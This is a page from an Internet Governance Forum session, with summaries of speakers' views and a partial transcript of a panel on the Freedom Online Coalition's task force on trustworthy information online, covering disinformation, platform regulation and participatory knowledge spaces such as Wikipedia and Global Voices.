This analysis provides a detailed exploration of key points surrounding the role of the internet in relation to marginalized voices, information distortion, and the need for reliable information structures. One argument put forth is that while the internet presents opportunities for marginalized voices to be heard, it also brings about the potential for distortion and muddled reliability of information. This highlights the challenge of navigating and discerning credible information in the digital age.

Partnerships with civil society and the private sector are emphasised as vital in building reliable information structures. By collaborating with these sectors, it is believed that information can be better managed and disseminated. These partnerships can contribute to the development of robust platforms and frameworks that promote the availability and accessibility of accurate information.

Governments are seen as having a responsibility to create human rights-based ecosystems of information. This implies that governments should prioritize the protection of individuals’ rights to access and share reliable information. By ensuring the existence of a conducive environment for the free flow of information, governments can help to counteract the negative effects of misinformation and disinformation.

The analysis also discusses the need for sound regulation in managing online spaces. While it is recognized that regulation is necessary to curb harmful content and maintain order, it is crucial to strike a balance with the preservation of freedom of debate and active engagement. Finding this equilibrium ensures that online spaces remain open and democratic while effectively managing potentially harmful content.

Furthermore, community engagement is considered pivotal in determining and implementing appropriate regulatory measures. By involving and empowering communities, there is a higher likelihood of generating regulations that reflect the needs and perspectives of those affected by them. This participatory approach can foster more effective and inclusive governance of the internet.

The responsibility of large online platforms in content regulation is also highlighted. These platforms are seen as having a unique role in determining what content is published and how it is accessed. Given their influence and reach, the analysis suggests that these platforms should bear a responsibility to uphold ethical standards and prioritize reliable and reputable content.

The analysis touches upon the importance of government funding for the Global South and majority voices. Recognising the existing inequalities, it is argued that governments should allocate resources to support marginalised regions and communities, enabling them to actively participate and have their voices heard.

Noteworthy observations include the excitement surrounding the European Union’s efforts to regulate big tech. The EU is viewed as a potential model for global implementation due to the progress it has made in developing regulations that could serve as a reference for other jurisdictions.

The analysis also emphasises the necessity of collaboration with various organisations to engage in meaningful dialogue and foster improvement. By partnering with diverse stakeholders, there is a greater opportunity to address the challenges associated with information access and dissemination effectively.

In conclusion, this extended analysis highlights the multifaceted issues surrounding the internet’s impact on information reliability and the inclusion of marginalised voices. It underscores the importance of partnerships, government responsibility, sound regulation, community engagement, and the role of large online platforms. Moreover, it reflects the growing recognition that a collaborative and multi-stakeholder approach is essential for building reliable information structures and ensuring the availability and accessibility of trustworthy information online.

Alisson Peters

The United States actively promotes trustworthy information online and combats disinformation on a global scale. They support initiatives to address disinformation and emphasize the importance of digital media and information literacy in enabling individuals to freely express themselves and evaluate information. Additionally, the United States focuses on media resilience by bolstering the resilience of media outlets against legal and regulatory challenges. They support fact-checking and independent media initiatives, aiming to ensure citizens have access to accurate and reliable information.

However, there is concern about the misuse of power by governments to ban certain forms of expression. Governments around the globe claim broad powers to restrict freedom of expression, silencing peaceful dissent. Stakeholder platforms like the Internet Governance Forum (IGF) play a critical role in addressing threats to freedom of expression. These platforms are essential for finding solutions to challenges in the digital world.

The Freedom Online Coalition is a global platform working towards promoting trustworthy online information. It is important to strike a balance between promoting reliable information and upholding democratic principles. The task force’s efforts must not compromise democratic values.

In conclusion, the United States actively promotes trustworthy information online, supports initiatives to combat disinformation, and emphasizes the importance of digital media and information literacy. They also focus on media resilience and support fact-checking and independent media. However, there is concern about the misuse of power by governments to censor expression. Stakeholder platforms like the IGF are critical in addressing threats to freedom of expression. The Freedom Online Coalition promotes trustworthy information while upholding democratic principles.

Ivan Sigal

In the analysis of the given text, several key points are highlighted. Firstly, it is emphasised that online spaces should be open and interoperable, and that user agency is crucial. This means that individuals should have the freedom to access and engage with online platforms and content and have control over their online experiences. The argument is made that the healthy promotion of a wide range of participation is critical in the internet space.

Promoting voice and expression is identified as another important aspect of online spaces. It is suggested that critical thinking about how institutions and media are built is necessary to achieve this goal. Historical facts and friction in the internet context indicate that creating spaces where people can participate more or less equally requires a proactive effort and careful consideration of the diversity of media sources, their funding, and sustenance.

Ivan Sigal, along with organizations like Wikipedia, Global Voices, and Witness, values citizen-generated participatory internet as the core of trustworthy online information. These organizations are seen as starting from an open knowledge perspective and working with communities for whom being online is not easy. However, the break in trust around large social media platforms is identified as a significant challenge.

The potential impact of internet regulations on small and medium-sized non-profit initiatives is a concern. It is argued that regulations being implemented in many global north countries could make it either impossible or expensive for civic-oriented initiatives to create new platforms.

The need for trustworthiness and authenticity in information sharing is emphasized. Global Voices and Wikipedia are highlighted as examples of initiatives that aim to create and share trustworthy information. It is stated that these initiatives are seen as a civic act by many.

Furthermore, the analysis acknowledges the pervasive and complicated bias in news framing. It suggests that news organisations alone are not sufficient to provide all the different kinds of information required in the world. Therefore, alternatives that allow easy entry into an information space and enable the addition of a diversity of voices are needed.

The importance of including a participatory side in regulatory processes is emphasized. It is argued that previous principles have not adequately emphasized this aspect. The analysis suggests that reestablishing the participatory side is crucial to make effective regulations.

The issue of disinformation is also discussed, highlighting its intentional misleading of people and groups. It is noted that disinformation affects many communities in multiple languages. Additionally, the distinction between misinformation and disinformation is highlighted, with the former being seen as ignorance in another language and the latter as deliberate lying.

The analysis also touches upon the need for better information in other languages, particularly for marginalized groups. Initiatives such as Rising Voices, which work with indigenous and marginalized groups to identify languages and support the creation of their own trustworthy information sources, are valued.

The importance of including community voices in conversations is stressed, particularly those from communities that traditionally have less power and resources. The analysis suggests that these communities should not be ignored, and their voices should be included in discussions.

Overall, the analysis advocates for open and interoperable online spaces that prioritize user agency and promote voice and expression. It underscores the importance of proactive efforts to build equitable spaces, address the challenges related to trust on social media platforms, and consider the impact of regulations on non-profit initiatives. It highlights the need for trustworthy information, alternative news sources, and multilingual support. The analysis also underscores the significance of including a participatory side in regulatory processes, distinguishing between misinformation and disinformation, and valuing community voices.

Jan Gerlach

The discussion revolves around the topic of internet regulation and its impact on online spaces. Several key arguments are presented, highlighting the potential negative consequences of centralizing power over online speech and content trustworthiness in the hands of platforms. The Wikimedia Foundation argues that regulation is pushing the decision-making authority on online content to platforms, which raises concerns about the consolidation of power and the potential for biases.

Another argument raised is that excluding people from participating in online knowledge spaces can promote misinformation. It is suggested that when individuals are prevented from engaging in these spaces, the void left behind is often filled with inaccurate and misleading information. The discussion emphasizes the importance of a participatory approach in knowledge spaces as it is seen as essential for promoting peace, security, and combating misinformation.

In contrast to the centralized approach, the conversation encourages regulations that empower communities to make decisions about online content. Jan Gerlach argues for a decentralized approach to internet governance, advocating for regulations that distribute decision-making power among various stakeholders rather than concentrating it solely in the hands of platforms. This approach seeks to ensure a more inclusive and diverse representation in shaping the online environment.

Other noteworthy points include the concerns about laws that make knowledge more expensive, which are viewed as potentially limiting access to information. Furthermore, the discussion highlights the negative impact of regulations that primarily benefit big media houses at the expense of independent journalism and individuals in conflict zones.

The significance of collaboration and sharing best practices is emphasized to safeguard people’s ability to contribute to online spaces and tell their stories. The engagement of governments in conversations about online spaces and freedom of expression is also welcomed, showcasing the importance of multi-stakeholder involvement in shaping internet policies.

The role of Wikipedia is highlighted as an “honest broker” in supporting journalism and promoting information integrity. Moreover, the organization serves to educate policymakers about the mechanisms and functioning of Wikipedia and the potential effects of different regulations on global online spaces. This education aims to increase awareness and ensure more informed decision-making processes.

The establishment of a task force and the associated principles is considered essential for coordinating responses to challenges related to information integrity. This initiative brings together governments, civil society, and proactive private actors to strategize and coordinate processes that promote information integrity in online spaces.

Finally, the conversation encourages individuals to actively engage and join communities like Wikimedia, contributing to their development and understanding how systems like Wikipedia and citizen journalism work. It emphasizes that organizations like Wikimedia exist to support these communities, underscoring the collective responsibility in creating and maintaining diverse and accessible online spaces.

In conclusion, the discussion on internet regulation and online spaces highlights the potential negative consequences of centralization and exclusion. It calls for a participatory approach in knowledge spaces and regulations that empower communities. The conversation also raises concerns about laws that make knowledge more expensive and regulations that benefit big media houses. Collaboration, government engagement, and the role of organizations like Wikimedia are seen as critical components in safeguarding people’s ability to contribute to online spaces, promoting information integrity, and supporting diverse and accessible online environments.

Session transcript

Moderator:
You Because as you can see we are a very small group being the first session of the day I believe. Thanks so much to everybody for for joining today. The session is Safeguarding a Trustworthy Global Information Ecosystem and in this session we are going to focus on the work of the task force on trustworthy information online and the launching of a set of principles by that task force. We hope it’s gonna be an interactive session. I think we’re such a small group and a number of us are very deeply involved in this work that I think it could actually be a strategy session for for the task force for the work going ahead and for the principles. So maybe to start with I could just give some context to to the task force and then we’ll move into opening remarks and and dig into discussion. So the task force on trustworthy information online is a multi-stakeholder task force that has recently been launched in the Freedom Online Coalition. The task force is continuing the work of the Action Coalition on Trustworthy Information Online that was established by the Danish Ministry of Foreign Affairs, Wikimedia, Witness, Global Voices and Salesforce under the Tech for Democracy initiative by the the Danish government. While in the FOC the task force is going to be chaired by the government of Denmark and the Wikimedia Foundation and the Action Coalition’s intention was to identify solutions to support trustworthy information online and the objective of this task force will be to carry forward that work and propose policy recommendations for governmental institutions and lawmakers with the goal of safeguarding a healthy online information ecosystem. So that’s very broadly the task force and then later in the session we’re going to get into the principles that have been proposed and the work of the task force but to start with first we’ll have opening remarks from Allison Peters the acting Deputy Assistant Secretary of State in the Bureau of Democracy and Labor in the US State Department. Allison.

Alisson Peters:
Well good morning to a bunch of very familiar faces and friends and a sincere thank you in particular to our colleagues in the Danish government for their leadership in establishing the Freedom Online Coalition’s newest task force on trustworthy information online and also to our fellow FOC advisory network members the Wikimedia Foundation for taking on the role of co-chair alongside the Danish government. As the chair of the FOC we in the United States are proud of our partnership with both the government of Denmark and all FOC members as well as the advisory network to advance human rights online and an open internet that is interoperable secure and reliable for all. Digital media and information literacy empowers people to freely express themselves and arms individuals with the knowledge and skills to communicate and critically evaluate information. The United States is promoting trustworthy information online by bolstering our support for initiatives to address disinformation globally from fact-checking initiatives to media literacy while at the same time we seek to also bolster an independent media globally. We’re promoting and protecting open and resilient information ecosystems by addressing critical needs for at-risk journalists, fostering the long-term sustainability of independent media outlets, enhancing the impact of investigated journalism and bolstering outlets resilience to legal and regulatory challenges including through our journalism protection platform. And I’ll note here we’re very proud members as is the government of Netherlands as our chair and the government of Denmark of the Freedom Online Coalition and we are going to continue to work through that global platform with our partners and allies to advance these efforts. I will note for this conversation and I think for the broader community here at IGF that we really have to continue to be mindful that our approaches to promoting trustworthy information online including our efforts to counter disinformation do not inadvertently undermine the bedrock principles that undergird democracies particularly fundamental freedoms, freedom of expression both online and offline. We’ve seen how governments around the globe continue to claim for themselves very broad powers to ban certain forms of expression all too often misusing that power to repress peaceful dissent and silence the voices of independent media, civil society activists, human rights defenders, dissidents, members of religious, ethnic, racial and other minority groups around the globe. That’s why platforms like IGF are so critical for us to continue to bring stakeholders together to address these threats and challenges and strengthen our resolve to tackle them. So again I just really want to thank you all for being here bright and early for what is a really critical conversation. This is just the start of the conversation not the end in our work in the Freedom Online Coalition and we look forward to an exciting year and years ahead for this task force. Thank you guys so much.

Moderator:
Thanks so much Allison and it’s great to hear the number of approaches the US government is taking to foster trustworthy information ecosystems and I think that really underscores the importance of taking a multi-pronged approach to this. And so maybe to just start the session first I wanted to introduce our other panelists. We have Jan Gerlach the director of public policy from Wikimedia, Ivan Siegel the executive director of Global Voices and Clara Christensen the head of section Danish Ministry of Foreign Affairs. They all fill different seats, company, private sector, civil society and government which I think is great because it’s important that we bring different perspectives to this conversation. And maybe to start with it would be wonderful to hear from each of our panelists about what do you see as the key challenges to fostering a trustworthy information space and how can the work of the task force help address these challenges. And maybe we can just go down the line starting with Jan.

Jan Gerlach:
Yeah, hi, everybody I guess Key challenges is what you asked for. Yeah, so my name is Jan. I’m at the Wikimedia Foundation. We are the nonprofit that hosts and operates Wikipedia and supports a global set of communities that built Wikipedia and other free knowledge projects. And from our perspective key challenges right now are I think a trend towards consolidation of power over speech online that is actually driven by lots of governments that seek to promote freedom of expression. And we’re seeing regulation that unfortunately pushes the powers to make decisions about what content should be online and what is and isn’t trustworthy on two platforms. Whereas this knowledge is really held by communities around the world and if we prevent people from participating we’re really not doing ourselves a favor. I wrote down a few notes this morning and I was really thinking you know when you when you prevent half the world from participating in knowledge spaces this is actually just also a matter of peace and security to make it really a drastic statement here. When half the world is prevented from joining conversations and deciding what is and isn’t trustworthy then that void will be filled with misinformation. And I think that’s a humongous challenge for all of us especially in the age of generative AI that is powered by knowledge that is out there on the internet. And when half of that knowledge is not true, is not verifiable, is not trustworthy then we all have a big problem. And I think that’s sort of the challenge that we’re looking at right now.

Moderator:
Yeah thanks for that and I think that echoes a lot of what Allison was saying as well in terms of governments asserting power and control over access to the information, access to different types of information. I think you also see this from a commercial perspective as well in terms of what how companies are curating the information that we we have access to. Ivan it would be wonderful to hear from you. You do citizen related journalism. From your perspective what do you see as the challenges?

Ivan Sigal:
Good morning everyone, I’m Ivan Sigal. I’m the executive director of Global Voices. Global Voices is a large community of writers, translators, and digital activists mostly based in focusing on global majority communities around the world. And we are coming up on our 20th anniversary this year. So we’ve been practicing the art of identifying and finding accurate and trustworthy information in online spaces but with a particular attention to equity and diversity of voices and languages. Asking whose knowledge, asking whose perspectives matter, and who do we hear, and how are individuals represented, how do they represent themselves in online spaces for a very long time now. And interestingly the basics haven’t changed that much. The core question still is I think for a trustworthy information online space is you have to have a open interoperable network that has something like a common carrier system and you have to have user agency. That’s the first step. And then the second is the healthy and across society a healthy promotion of a wide range of participation because a dominant mode of expression or a dominant way of thinking about the internet is that it’s frictionless, it’s easy, and that openness equates to somehow the availability for everybody to do anything in online spaces. But when you actually think about the internet in context of history you realize that historical facts and friction and participation and access has always been inequitable and it’s always been the effort to kind of find to build spaces where people can participate more or less equally is actually a lot of work. It takes a lot of effort, a lot of time to create spaces where people can come together and talk in an equitable way and that’s a lot of what we do. And I think that that kind of promotion of voice and promotion of expression requires thinking carefully and critically about how institutions are built, institutions of knowledge are built, about how not just about freedom of expression, freedom of media, but also about whose media. So thinking about carefully about the diversity of those sources, about how they’re funded, how they’re sustained, and so on and so forth. So I think a lot of the comments we’ve heard thus far I agree with everything said from Jan and from Allison so I’ll stop there for the moment and just continue.

Moderator:
Yeah thanks, Ivan and I think that’s a really important point that the internet creates a number of opportunities to create equal spaces but we have to have the intention when we actually build those spaces and use them to to have them be equal. Clara maybe from your perspective as a government what are the challenges to a trustworthy and safe information environment?

Klara Therese Christensen:
Now yes you can hear me great. Hi good morning everyone thank you so much for showing up. My name is Clara Christensen and I’m part of the tech ambassadors team at the Danish Ministry of Foreign Affairs and I’m pretty new to the whole tech agenda. I just started this August so I’m really excited to be here and be part of this discussion. And first and foremost I want to thank our friends and colleagues in the Freedom Online Coalition and especially the the chairship of the US and how you sort of carried this task force forward. I think this is really exciting for us to see from from the Danish perspective and I’m really excited to be here today because I think that online information is shaping our world and our realities and that’s why we need to build healthy online information systems. And while as we’ve heard you know this is sort of an opportunity to give voice to marginalized groups to to people who normally wouldn’t have a chance to participate then definitely the sort of online forum also can distort information and sort of make it harder to navigate what kind of information is trustworthy what is not and this is why we need to build reliable information structures in partnership with civil society with private sector and I think this is sort of one of the Danish key values that we need to build these things in partnership. Yeah so I’m really happy to to be part of this task force together with Witness, Global Voices, Wikimedia, Salesforce and Freedom Online Coalition. I think this is like it’s gonna be a great discussion and happy to see this sort of growing out of the Tech for Democracy initiative that we launched two years back. Happy to see it grow this is exciting and I think sort of as a government we do have a responsibility to try to build human rights based ecosystems of information and that also means regulation and I think definitely there is a tension between sort of as we talked about you know some governments may be wanting to take a lot of control over these online spaces in a way that might not be very conducive to sort of a free debate and active engagement and on the other hand sort of also the government taking a role into sort of yeah trying to to provide like some sound regulation and we have to do that in partnership with the private sector, with civil society, with our community to try to make sort of regulation that that works that actually matter and that can provide sort of trustworthy information. So I think this is going to be exciting sort of talking a little bit about how do we do that and how do we actually engage with you know the communities to sort of make sure that we do this in the right way. Yeah and I think sort of I’m so happy to see these principles being launched today I think this is really a good foundation and I’m happy to talk about how we put them into action and how we actually sort of build on these principles to to try to have more trustworthy information online. I think that’s that’s it for me.

Moderator:
Thanks Clara. So as you said the first part of the work of the task force is really the launch of these principles. It’s a core set of principles to guide the work that it will be doing. There are three principles I think everyone’s got the paper in front of them. Meaningful multi-stakeholder engagement, protect and promote international human rights standards, and a diverse trustworthy and equitable internet. And since we have a very small group, many who are already familiar with this work, maybe we can spend some time just really digging into these principles. But first I don’t know Jan or Ivan if you want to talk a little bit about the background, what went into developing them, some of the thinking behind these principles, since you were connected to the coalition as well.

Ivan Sigal:
Yeah sure I’ll happily do that. So something that really attracted me to this particular group is that on the nonprofit side we had Wikipedia, Global Voices, and Witness. Three organizations that I think have an unusual perspective on what it takes to actually build trustworthy online spaces and trustworthy online information because they have started from an open knowledge perspective and from working with communities that are not necessarily, for whom being online is not necessarily an easy thing, especially in the context of say Witness’s work and some of Global Voices’ work. But that kind of idea of a citizen-generated participatory internet is the core of a somewhat now almost naive and older idea that has since been commercialized and this now sits broadly across all societies as opposed to of building communities with intention. And these three groups are all our communities built with intention. So working with them is, to me, is a really great place to assert or reassert a set of values as to what it actually takes to try to build trustworthy information spaces and open knowledge. And so I’m super happy that we’re doing it in this way.

Jan Gerlach:
Yeah, and I think to add to that, Ivan actually alluded to it, it’s not a given that people can contribute to these spaces, right, and can tell the stories from the world around them, from their communities. I want to emphasize that also adding knowledge to Wikipedia is not a trivial task in many places in the world. And not just because connectivity is a problem, but actually it might be dangerous to just document the places that you inhibit in places where freedom of expression is not upheld or where governments are actively trying to suppress certain information about how their countries run, right? And that is why, again, it is very, very important that these groups come together, organizations like ours to share also best practices, to share, I think, strategic thinking and why these spaces here are really important for us to come together, and why I think also the engagement of governments is just so welcome, right, who need to understand how their actions in, say, North America, in Europe, in the global north, how their regulation actually affects people elsewhere too and enables them or empowers them to participate, or, in the worst case, actually prevents them from doing so. And that’s why I think we’ve happily joined this task force because this is a great forum to raise these issues.

Moderator:
Thank you for that. And so, I mean, there’s three principles. The meaningful multi-stakeholder engagement, which is focusing on, I think, a lot of what you were saying, Ivan, about the importance of having different stakeholders come to the table to inform the design, development, deployment, evaluation of technologies. I think it’s interesting that this has standards and protocols relevant to the information ecosystem, which gives an important nod to the technical community. And working together to protect human rights and democracy in the front lines. Then protect and promote international human rights standards, so ensuring that regulation is in line with international human rights standards, strengthening privacy and data protection regimes across the world, and a diverse, trustworthy, and equitable internet, prioritizing free, open, transparent, interoperable, reliable, safe, and secure internet. And so, I guess my first question is, are there any reactions to these principles as they sit right now? My understanding is that the task force will actually be fleshing them out quite a bit more. So, first question to everybody in the room is, are there reactions to these principles? They seem on target. Um. I don’t know.

Ivan Sigal:
I’ll just say really quickly, it’s a really interesting moment to try to do this because, as you said, and several speakers have said already, many governments are thinking about how to regulate the internet much more actively now, and not just regulation from a repression standpoint, though that is certainly happening, but we also see lots and lots of attempts from global north countries trying to think about how to regulate, especially the platforms and the big tech companies in ways that are potentially really complicated and difficult for small, medium-sized, citizen-driven initiatives, or non-profit initiatives, or potentially rebound in ways that make it impossible or extremely expensive to create new kinds of platforms that are civic in intent rather than commercial in intent. And so, and at the same time, we have seen something like a break in trust around the large social media platforms. That’s been true for years, but the last two or three years have been really intense in that regard, which is both a big challenge and also a huge opportunity for us to reset, potentially, or rethink ways around instantiating and supporting these kind of basic, these communities that have a core set of civic values in their approach to online participation in the creation of community, the creation of knowledge, the creation of information. So when we think about these statements, I think that’s where we’ve been coming from as a group. And so if you see, not that many of the previous set of principles that we’ve seen launched over the years have really emphasized this participatory side. And I think that’s really important for us to kind of reestablish that side of it as well as the other part. So thanks.

Moderator:
Yeah, and I agree. I think we are seeing a rise in platform regulation that can have either intentional or unintentional impacts on platforms if it doesn’t really speak to the business model or the way that the platform functions or the services that are offered and can have unintentional consequences for the rights of users. And so I guess there’s two approaches. We were thinking that we would have a larger group. We were thinking maybe we would go, each person would take a principle and talk about it, talk about why it’s important, what it might mean in practice and how it could guide the work of fostering trustworthy information ecosystems online. So we could do that or we could talk about maybe a little bit more tangibly how the task force can apply these principles to the work that it’s doing, what might be the priorities of the task force going forward. It would be great to have input of what others think the priorities of the task force should be as it starts to work within the FOC. So I don’t know if there’s a preference between those two approaches. Yes, we are. This is fully interactive. So please, questions, comments.

Audience:
Thank you. I was formerly at Global Voices. So I’m very happy to be here. Keiko, it is great to see the work of Wikimedia and Global Voices on the Coalition working towards the trustworthy global information ecosystem. And I see the panel seem to sort of reify this approach to global ecosystem in terms of its diversity and inclusion where many of us are present. And I was wondering, because a lot of the disinformation and its harms are happening in the other areas outside of the Western-centric approach. And I was wondering how you guys are going to sort of scaffold their way of, not many of them are shifting from oral culture to digital cultures. And the impact of disinformation is not so much that is limited in the cyberspace, but there are coming to the lives of people that are in different languages. And that is why I think it’s very important in places like Global Voices and Wikimedia that has all these people that are contributing their time and efforts in other parts of the world. Thank you.

Moderator:
Yeah, are there other questions or comments, input into perhaps challenges that you see in the information ecosystem that the task force could concentrate on? Go ahead.

Audience:
Hi, good morning. I’m Nick Beniquista. I’m from the Center for International Media Assistance at the National Endowment for Democracy. Look, the principles look fine. I’d say, if anything, they look a little innocuous. No one’s gonna disagree with these. And we work on media development as a kind of an approach to information integrity, and have argued that over the years, we need systems level really pretty major interventions if we’re gonna fix the problems that we have in the information ecosystem. So things that affect how eyeballs and money are being moved through the digital ecosystem. So this includes things like Pluralis in Europe, trying to really bring massive amounts of private capital to bear, trust initiatives that are trying to really change the economic incentives for quality information online, and many, many others. And of course, policy interventions like bargaining codes that could really transform. It’s imperfect, I know, but we’re looking to all these options. In that context, the sort of participatory, citizen-driven approach seems a little quaint. And just to be provocative. Hasn’t, I mean, Wikipedia and Global Voices is incredible. You’ve done incredible work over the years, but faced with these sort of systemic level challenges, how does your vision for a kind of a participatory approach still matter?

Jan Gerlach:
Sure. I think it matters more than ever, probably. And I guess I need to say that, but I do believe in it as well. You’re talking about sort of changing incentives, economic incentives around eyeballs. And you’re probably alluding to supporting journalism and I think Wikimedia can be sort of an honest broker in there, as in, if stories go away, if stories, if local journalism isn’t funded, isn’t sustainable, regional journalism, those stories cannot be on Wikipedia, right? Wikipedia is not a place for original research, but every edit, every article refers to sources out there that are verified by the people who work on Wikipedia. And that’s why we have a very strong interest in the media landscape being healthy and being diverse, right, for these stories to not just be sort of driven by engagement, as you mentioned, but really documenting the world and being trustworthy. And now every story that goes away, however, also goes behind a paywall, is not accessible for many people around the world. We understand that journalism needs to be funded, media work needs to be sustainable, but we really have concerns about laws that basically just put a larger price tag on this knowledge, right, per se. And so I think there’s a role for governments to play there, there’s a role for independent initiatives, but I think the answer cannot be, let’s move money away from all platforms and make it harder for non-profit platforms even to share and carry this knowledge and move it to, say, big media conglomerates, right? And that’s, I think, what we’ve been seeing around the world how this has been happening, right? It’s not independent journalism that ultimately benefits, it’s not your person somewhere in, I think, a conflict zone who ultimately benefits, but it’s usually the big media houses that we see sort of pushing this kind of regulation as well. We’re really worried about that, but we see ourselves sort of as an honest broker in the middle, right? We know this must be accessible, but it must also be sustainable to actually work as in media, right? And that’s why this is, I think, a super important space for us to engage in and we welcome the question.

Ivan Sigal:
Let me just add that both of these organizations are part of a process of field building, so it’s not just about Global Voices and Wikipedia, it’s about a whole universe of people who see it as their, see it as a civic act to create and share information that’s trustworthy. And that is not only about media creation, that’s, it’s also about knowledge building outside of the news. And, you know, that’s what SEMA does, you focus very much on the news and the professionalization of it. It’s really important to say that one of the reasons projects like ours got started is because of pervasive and complicated bias in news framing. That’s a history of the news media from the last 50 years. I mean, it’s not the case that news organizations are adequate or sufficient for all the kinds of information we need in the world. We do need a diversity of voices, a diversity of perspectives. And in many countries around the world, as you know, if you work in the media development field, it’s been very, very hard to get that kind of diversity, even when there is a financial sustainability. That’s what, and so creating alternatives that allow people to have easy entry into an information space, to be able to build their own systems, their own communications platforms, their own communities, whatever initiative they might create that helps to add a diversity of perspectives and voices and more information coming from more places is a good thing. It is not a zero-sum system. And like, yes, Global Voices is small, but we’ve had about 8,000 people participate with us and we’ve had hundreds of media partners over the years. And we work on our typical basis with about 50. So it’s, you know, at any given time. So it’s not by itself maybe as significant as you’d like it to be, but it is part of a larger way of thinking about how information works. And I think that kind of story is really important to maintain and sustain and grow. And there’s no reason why it can’t keep growing as long as there’s a fundamental framework to allow it to be true. And so that’s why sometimes saying these, as you acknowledged, sometimes very basic ideas, these very basic principles need to be restated because the alternative, which is that we build a regulatory process that’s all about big technology versus large media outlets, which are basically competing for access to information, to advertising dollars, takes the civics out of the equation. And so we’re here to try to make sure that the civics stays part of the equation.

Moderator:
I don’t know if there was additional thoughts onto the comment that you made, which I understood kind of about the voices and multi-stakeholder voices and maybe power of voice as well.

Ivan Sigal:
I mean, I can address that really briefly as well, which is just, yes, you’re absolutely right, Kiko, about how disinformation does affect many communities in many languages. And I think it’s very important to make a clear distinction between misinformation and disinformation as well, by the way. Misinformation, which is generally ignorance in another language and disinformation, which is lying, which is intentional misleading of peoples and groups. We certainly see a lot of that and thinking about how to buttress or support better information in other languages in a whole range of languages is a big part of what we do. I know Wikipedia also does that. We have an initiative called Rising Voices, which works with indigenous and marginalized groups to help to identify and languages to helps to build their own information sources and trustworthy information sources. And lots of others do have that kind of activity as well. And I think it’s super important to keep putting an emphasis on that type of project to stand in opposition to free-floating disinformation. Thanks.

Klara Therese Christensen:
So yeah, no, I think just like commenting on some of your thoughts on sort of like regulation, what’s the role of a regulation? And I think we need to sort of distinguish between the very large online platforms and sort of how we regulate them versus sort of the more like not-for-profit or smaller platforms and how to sort of like give access to like multiple voices and then also recognizing that very large online platforms do have like a special responsibility for like what kind of content comes online and how do you access it? And I think that has to be coupled with like, for example, funding from governments to support Global South, the global majority voice. to make sure that we try to create a more open space. And I think that’s some of the things that, for example, the Danish government is also trying to do through partners, through Access Now, to international media support, some of these organizations that we’re partnering up with to try to sort of make this a more open space where more voices can be heard. Because I definitely agree with you that this is something that we see as a big challenge. And it’s sometimes sitting in a government position up somewhere in Europe, it can be really hard and challenging to see where we have the blind spots that we have and where we are sort of restricting information and restricting the debate. So I think that’s, for us, super important to sort of partner up with organizations like yours to sort of to engage in that conversation and to get better. Then, of course, we have the whole sort of EU regulation, like a lot of regulation coming out of the EU right now, which I think is, for me, like super exciting and interesting to see how the EU, because, I mean, Denmark, as like a small country, we don’t do a lot of regulation ourselves on sort of very large online platforms, for example, and seeing how the EU is trying to build some regulation, but without having a lot of big tech companies and big online platforms, and how I think the EU is sort of trying to, yeah, to build, to make some regulation that could be used worldwide, but still sort of grappling a bit with how to do that in a way that, where we still sort of take into consideration the different local contexts in the global majority and sort of outside the EU, and I think that could be really interesting to also hear some perspectives on how you see that, how we’re doing that, if it could be better, how we, as a small country like Denmark, could sort of engage in that discussion also in the EU and what we should sort of bring to the table. I think that would be really interesting to hear from everyone here, and yeah, also on the panel. Yeah, that would be great.

Audience:
Hi, my name’s Michael Karanikolas. I’m the Executive Director of the UCLA Institute for Technology Law and Policy. These look really good. It strikes me that all three of these principles pose a challenge to traditional concentrations of power. Interoperability poses a challenge to large online platforms. Human rights standards restrict what governments might wanna do, and multi-stakeholder engagement. I’m academic slash civil society. Multi-stakeholder engagement is great for civil society because it gives them a seat at the table, but where it’s meaningful, obviously it restricts authority among governments to just take the actions that they wanna take and companies to take the action that they wanna take. So I guess my question is, have there been early responses from governments and industry? Is there a strategy for developing buy-in among the players whose power would be eroded by the adoption of these standards? Is that what we’re doing now, is developing that strategy? How do you make these actionable by generating will to move towards these by the people who it’s not necessarily in their immediate interests to do so? Hi, my name is Guus van Zwol from the Dutch government, Dutch MFA. Thank you for a great presentation. I mean, this is an issue that we’re very happy as an FOC country that this topic is being taken up. We think it’s a very important topic. That’s reason also why last summer we presented together with Canada, the Global Declaration on Information Integrity, which I think mimics a lot of these same principles, but maybe are a little bit more detailed. I’m just wondering, I mean, I mean, my question is the following. Being part now part of the, now we’re doing this work within the Freedom Online Coalition. I mean, this is a topic that’s also high on the UN agenda with the UN Code of Conduct, for example, which is part of our common agenda. And UNESCO has promoted their Internet for Trust initiative. And my question would be, how are we going to operationalize or promote these principles in those fora? Because that will be, I think, one of the key challenges that we see, which would also be, well, which would also provide a certain rationale or pretext for other countries to start regulating more these fora that we’re discussing. Not these international fora, but the social media companies, et cetera, et cetera. So my question would be, is how we’re going to operationalize these principles and how we’re going to organize ourselves in order to also address those international fora since we are, I mean, the FOC is, by definition, a diplomatic coalition.

Moderator:
Yeah, thanks. Maybe just to summarize, because I think there’s a couple of different threads that have emerged. One is a question of kind of what’s next with these principles? Is there going to be buy-in? How are they going to be used? My response to that right now is that the principles are meant to lay the foundation for the work of the task force, which has just been launched within the Freedom Online Coalition. And so the strategy around how these principles are going to be used is being built and developed. And this is the starting point to share that this is the foundation that the task force is going to be working off of. Another question, Joost, to what you were pointing to, was how are we going to coordinate with other initiatives that exist around information integrity, trustworthy online ecosystems, et cetera? How are we going to promote the work of the task force and the principles in key international forums, debates, processes that are happening at the international level? Also, I heard a number of, I guess, suggestions of what is needed to create a safe and trustworthy information ecosystem from taking a systems-level approach to ensuring that it is participatory and citizen-driven to ensuring that the regulation is human rights-respecting and is tailored to the platform. And also a number of challenges that individuals are facing at the local level with respect to the impact of disinformation. So maybe those are the different threads, and I don’t know if there’s any responses from the panel to those, or thoughts from other members in the audience that would like to build on some of those threads.

Jan Gerlach:
